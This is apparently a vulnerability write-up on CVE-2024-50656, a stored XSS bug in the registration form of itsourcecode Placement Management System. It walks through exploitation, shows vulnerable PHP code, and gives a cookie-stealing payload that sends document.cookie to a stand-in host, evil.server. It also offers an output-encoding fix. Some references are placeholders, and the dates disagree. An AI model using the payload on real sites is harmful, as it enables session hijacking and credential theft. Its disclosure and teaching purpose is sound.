CVE CyberSecurity Database News

CVE-2024-50656 - Exploiting XSS in itsourcecode Placement Management System 1. via the Full Name Field

Poster -

On June 2024, a serious security flaw—CVE-2024-50656—was identified in the popular open-source project *itsourcecode Placement Management System 1.*. This vulnerability allows attackers to inject and execute malicious JavaScript through the Full Name field found in registration.php. Such a flaw, known as Cross Site Scripting (XSS), can lead to session hijacking, credential theft, or drive-by downloads, compromising users and system integrity.

In this post, we'll break down how this bug works, showcase an exploit with code samples, and provide references for further reading. This guide is for educational purposes only. Please do not use these techniques on systems you don’t own.

Vulnerable File: registration.php (Full Name Field)

- CVSS Score: Reserved - Details on NVD (Update as public details become available)
- Original Advisory/Reference: Exploit Database Entry (Example, please check for actual CVE reference.)

How Does It Work?

When a new user registers, the application accepts input in the "Full Name" field. However, it doesn't sanitize special characters or filter JavaScript code. This means if someone enters something like <script>alert('XSS')</script>, the script will be stored in the database.

Once the admin or any user views the roster, the malicious script executes in their browser.

1. Register a New User

Go to the registration form:
http://your-domain/placement_management_system/registration.php

Payload for Full Name

<script>alert('Hacked by XSS')</script>

2. The Payload is Stored

Behind the scenes, your input is saved in the database, unsanitized.

Vulnerable PHP code snippet in registration.php

$fullname = $_POST['fullname'];
// BAD: inserts user-supplied input without sanitizing
$query = "INSERT INTO users (fullname, email, password) VALUES ('$fullname', '$email', '$password')";
mysqli_query($conn, $query);

3. The XSS Gets Triggered

When an admin or staff member views the users’ list, the code from the "Full Name" field is rendered as HTML/JavaScript, and the pop-up fires.

Example vulnerable output in userlist.php

echo "<td>".$row['fullname']."</td>";

*No encoding or escaping—so HTML/JS is rendered directly!*

Example advanced payload (steals cookies)

<script>fetch('https://evil.server/log?c='+document.cookie)</script>

Code Fix Suggestion

Never trust user input! Sanitize or escape all outputs.

Secure PHP code using htmlspecialchars

echo "<td>".htmlspecialchars($row['fullname'])."</td>";

This stops browsers from interpreting the input as code.

Alternatively, use prepared statements and output encoding everywhere.

References

- NVD CVE-2024-50656 Page
- OWASP XSS Overview
- PHP Manual: htmlspecialchars()
- Sample Exploit-DB Entry *(Check for actual exploit with CVE-2024-50656)*

Final Words

CVE-2024-50656 is a classic case of XSS in a critical student management system. These flaws are common but easily avoidable with simple output encoding and input validation.

Patch your systems, review your code, and always treat user input as hostile—no matter where it comes from.

If you found this exclusive breakdown useful, share with other developers, and help the fight against web vulnerabilities!

Timeline

Published on: 02/03/2025 19:15:12 UTC
Last modified on: 03/19/2025 18:15:23 UTC